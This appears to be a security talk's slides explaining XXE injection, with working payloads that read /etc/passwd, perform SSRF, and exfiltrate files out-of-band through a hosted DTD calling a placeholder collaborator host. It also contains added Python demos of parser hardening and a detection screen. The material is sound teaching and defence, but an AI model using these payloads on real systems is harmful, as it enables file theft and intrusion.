<null>alert(XXE)</null>
@nullmumbai: whoami
# Ankit Patel
# Associate Consultant (Aujas Cybersecurity)
# Application Security and Network Security
# Twitter Handle: @pwnnull
# Description:
• An XML External Entity (XXE) attack is a type of attack against an
application that parses XML input. It occurs when XML input
containing a reference to an external entity is processed by a weakly
configured XML parser.
• Ranked 4th in the OWASP Top 10 (2017).
- OWASP
Let's Dive into the Basics
# What is XML?
• XML stands for eXtensible Markup Language. It is a text-based
markup language.
• XML was released in the late 90s. It was created to provide an easy way
to store and exchange self-describing data.
• XML is designed to carry data, not to display data.
• XML tags are not predefined. You must define your own tags.
• XML is platform independent and language independent.
# XML Example:
<?xml version="1.0"?>
<NullMeet>
  <Speaker>
    <FirstName>Ankit</FirstName>
    <LastName>Patel</LastName>
    <ContactNo>1234567890</ContactNo>
    <Email>ankitpatel@null_mumbai.com</Email>
    <City>Mumbai</City>
  </Speaker>
</NullMeet>
# XML Attributes vs Elements
• XML using attributes:
<person gender="male">
  <firstname>Ankit</firstname>
  <lastname>Patel</lastname>
</person>
• XML using elements:
<person>
  <gender>male</gender>
  <firstname>Ankit</firstname>
  <lastname>Patel</lastname>
</person>
# XML DTD
• Document Type Definition, commonly known as DTD.
• A DTD defines the structure and the legal elements and attributes of
an XML document.
• Why use a DTD?
• An application can use a DTD to verify that the XML it receives is valid.
# Types of DTD
• There are two types of DTD:
  • Internal DTD
  • External DTD
• Internal DTD
  If the DTD is declared inside the XML file, it must be wrapped inside
  the <!DOCTYPE> definition.
• External DTD
  If the DTD is declared in an external file, the <!DOCTYPE> definition
  must contain a reference to the DTD file.
# Internal DTD
• !DOCTYPE NullMeet defines that the root element of this document
is NullMeet.
• !ELEMENT NullMeet defines that the NullMeet element must
contain the elements FirstName, LastName, ContactNo, Email and
City.
• !ELEMENT FirstName, LastName, ContactNo, Email and City defines
each of those elements to be of type "#PCDATA".
# External DTD
• If the DTD is declared in an external file, the <!DOCTYPE> definition
must contain a reference to the DTD file.
• External DTD file:
• XML file contents:
# XML DTD entities
• Entities are used to define shortcuts to special characters.
• Entities can be declared internal or external.
• Internal Entity
An internal entity is one that is defined locally within a DTD.
• Declaring the internal entity
  • Entities must be declared before they can be used.
  • All entities are declared with the "ENTITY" declaration.
# XML DTD built-in entities
• All XML parsers must support built-in entities.
• There are five built-in entities that play their role in well-formed
XML. They are:
  • ampersand: &amp;
  • single quote: &apos;
  • greater than: &gt;
  • less than: &lt;
  • double quote: &quot;
# XML DTD entities
• Internal entity example:
I. Syntax
<!ENTITY entity-name "entity-value">
II. Internal DTD Example
<!DOCTYPE Nullmum [
<!ENTITY writer "Ankit">
]>
The XML file:
<Nullmum>&writer;</Nullmum>
# XML DTD entities
• External entity
External entities, like internal entities, have names and are referenced in the
same manner, although they are declared differently.
• External entity example:
I. Syntax
<!ENTITY entity-name SYSTEM "URI/URL">
// The SYSTEM keyword must be followed by a URL (protocols like http, ftp, file, etc.
are allowed).
II. External DTD Example
The XML file:
<!DOCTYPE author [
<!ENTITY writer SYSTEM "https://www.w3schools.com/external.dtd">
]>
<author>&writer;</author>
Basics over, let's jump to the main topic (XXE)
# Types of XXE attacks
There are various types of XXE attacks:
• Exploiting XXE to retrieve files, where an external entity is defined
containing the contents of a file, which is returned in the application's
response.
• Exploiting XXE to perform SSRF attacks, where an external entity is
defined based on a URL to a back-end system.
• Exploiting blind XXE to exfiltrate data out-of-band, where sensitive data
is transmitted from the application server to a system that the
attacker controls.
• Exploiting blind XXE to retrieve data via error messages, where the
attacker can trigger a parsing error message containing sensitive data.
Exploiting XXE to retrieve files
• Payload used:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
XML file:
<productId>&xxe;</productId>
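To see what the "weakly configured XML parser" from the description actually does with a payload of this shape, here is an added Python example; it is not from the slides. It uses the standard library's xml.sax parser, writes a constructed stand-in file into a temporary directory instead of reading /etc/passwd, then parses the same <productId>&xxe;</productId> document twice: once with external general entity resolution switched on (the weak setting) and once with it off (the default since Python 3.7.1). The file name, its content and the product document are all constructed for this example.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import feature_external_ges


class TextCollector(xml.sax.ContentHandler):
    """Collects character data, i.e. what a naive application would echo back."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_product(xml_bytes, resolve_external_entities):
    """Parse a product document and return the text of its elements.

    resolve_external_entities=True  -> the weak configuration
    resolve_external_entities=False -> the hardened (and default) one
    """
    parser = xml.sax.make_parser()
    # feature_external_ges controls external *general* entities such as
    # <!ENTITY xxe SYSTEM "file:///...">; leaving it off is the mitigation.
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def build_payload(target_uri):
    """Same shape as the slide's payload, pointed at a constructed file."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{target_uri}"> ]>\n'
        "<productId>&xxe;</productId>\n"
    ).encode()


def demo():
    """Run the weak and the hardened parser against the same payload."""
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in for /etc/hostname; nothing outside tmp is read.
        secret = Path(tmp) / "hostname"
        secret.write_text("db01.internal")
        payload = build_payload(secret.as_uri())
        weak = parse_product(payload, resolve_external_entities=True)
        hardened = parse_product(payload, resolve_external_entities=False)
    # Internal entities are unaffected by the setting and still expand.
    internal_only = (
        b'<!DOCTYPE test [ <!ENTITY writer "Ankit"> ]>'
        b"<productId>&writer;</productId>"
    )
    baseline = parse_product(internal_only, resolve_external_entities=False)
    return {"weak": weak, "hardened": hardened, "internal_only": baseline}


if __name__ == "__main__":
    for name, text in demo().items():
        print(f"{name:13s} -> {text!r}")
```

With the weak setting the element text is the file's content; with the default setting the external reference is silently skipped and the element comes back empty, while the internal entity still expands in both modes. The same knob exists in other parser stacks under a different name (for example, the external-general-entities and disallow-doctype-decl features on a JAXP parser), which is what "disable external entities" on the mitigation slide refers to.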
DEMO
Exploiting XXE to perform SSRF attacks
DEMO
# Parameter Entities
• Parameter entities accomplish the same task as the other entities do.
• Parameter entities are used exclusively within DTDs.
• Using parameter entities you can include element and attribute list
declarations as groups and refer to them easily as single entities.
• You can even include an entire DTD in a parameter entity.
Example:
<!ENTITY % myParameterEntity "Element">
# Parameter Entities
• Example:
<!ENTITY % customer "name, street, city, state, zipcode">
• Later in the DTD, you can reference this parameter entity as follows:
<!ELEMENT invoice (%customer;, item, price, date)>
• When this DTD is processed, it is as if you had specified the following:
<!ELEMENT invoice (name, street, city, state, zipcode, item, price, date)>
Exploiting blind XXE to exfiltrate data out-of-band
• Payloads used (hosted DTD):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM
'http://collaborator_url/?x=%file;'>">
%eval;
%exfil;
XML file:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
DEMO
Exploiting blind XXE to retrieve data via error messages
• Payloads used (hosted DTD):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
XML file:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
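Both blind variants leave nothing useful in the application's response, so the practical place to catch them is before the body reaches the parser: a request that declares an external DTD, an external entity or a parameter entity has no business being handed to a business-logic parser. The following added Python example (not from the slides) is such a pre-parse screen. It isolates the DOCTYPE of an incoming XML body with a regular expression, reports each reason the body should be rejected, and offers a policy that can either forbid every DTD or allow internal-only ones. The sample bodies are constructed to mirror the shapes of the slide payloads; "http://dtd.example/placeholder.dtd" is a placeholder standing in for the slide's "YOUR-DTD-URL".

```python
import re

# Isolate the DOCTYPE: "head" is everything before an optional internal
# subset "[...]"; "subset" is the bracketed part with the entity declarations.
DOCTYPE_RE = re.compile(
    rb"<!DOCTYPE\b(?P<head>[^\[>]*)(?:\[(?P<subset>.*?)\])?\s*>", re.I | re.S
)
# <!ENTITY name SYSTEM "..."> or <!ENTITY % name PUBLIC "..." "...">
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.I
)
PARAMETER_ENTITY_DECL_RE = re.compile(rb"<!ENTITY\s+%", re.I)
PARAMETER_ENTITY_REF_RE = re.compile(rb"%[A-Za-z_:][\w.:-]*;")
# <!DOCTYPE root SYSTEM "..."> pulls a whole external DTD subset
EXTERNAL_SUBSET_RE = re.compile(rb"\b(?:SYSTEM|PUBLIC)\b", re.I)


def screen_xml_body(body):
    """Return the reasons to reject a raw XML body; an empty list means none."""
    match = DOCTYPE_RE.search(body)
    if match is None:
        return []                      # no DTD at all: nothing below can apply
    head = match.group("head") or b""
    subset = match.group("subset") or b""
    reasons = []
    if EXTERNAL_SUBSET_RE.search(head):
        reasons.append("external DTD reference on DOCTYPE")
    if EXTERNAL_ENTITY_RE.search(subset):
        reasons.append("external entity declaration (SYSTEM/PUBLIC)")
    if PARAMETER_ENTITY_DECL_RE.search(subset):
        reasons.append("parameter entity declaration")
    if PARAMETER_ENTITY_REF_RE.search(subset):
        reasons.append("parameter entity reference in internal subset")
    return reasons


def is_acceptable(body, allow_internal_dtd=False):
    """Policy gate: reject anything flagged, and by default any DTD at all."""
    if screen_xml_body(body):
        return False
    if not allow_internal_dtd and DOCTYPE_RE.search(body):
        return False
    return True


# Constructed request bodies shaped like the slide examples.
SAMPLE_BODIES = {
    "plain": b'<?xml version="1.0"?><productId>42</productId>',
    "internal_entity": (
        b'<!DOCTYPE Nullmum [<!ENTITY writer "Ankit">]>'
        b"<Nullmum>&writer;</Nullmum>"
    ),
    "file_read": (
        b'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
        b"<productId>&xxe;</productId>"
    ),
    "blind_oob": (
        b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM '
        b'"http://dtd.example/placeholder.dtd"> %xxe;]><foo/>'
    ),
    "external_dtd": (
        b'<!DOCTYPE foo SYSTEM "http://dtd.example/placeholder.dtd"><foo/>'
    ),
}


def demo():
    """Screen every sample body and return name -> list of reasons."""
    return {name: screen_xml_body(body) for name, body in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    for name, reasons in demo().items():
        verdict = "accept" if is_acceptable(SAMPLE_BODIES[name]) else "reject"
        print(f"{name:16s} {verdict:7s} {reasons}")
```

The screen works on raw bytes and parses nothing, so it is cheap to run in a gateway or as a first step of the handler; the verdicts it produces are also the log lines a detection engineer wants, since a rejected body with a parameter entity reference is a strong signal of the blind variants above. It complements, and never replaces, disabling external entities in the parser itself: a regular expression can be evaded, a parser feature cannot.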
DEMO
# Mitigation for XXE
• Disable external entities.
References:
• https://www.w3schools.com/xml/xml_whatis.asp
• https://portswigger.net/web-security/xxe
• https://www.synack.com/blog/a-deep-dive-into-xxe-injection
• https://www.youtube.com/watch?v=gjm6VHZa_8s
Thank you null|Mumbai for the opportunity

XXE Attack Document: Understanding XML External Entity (XXE) Injection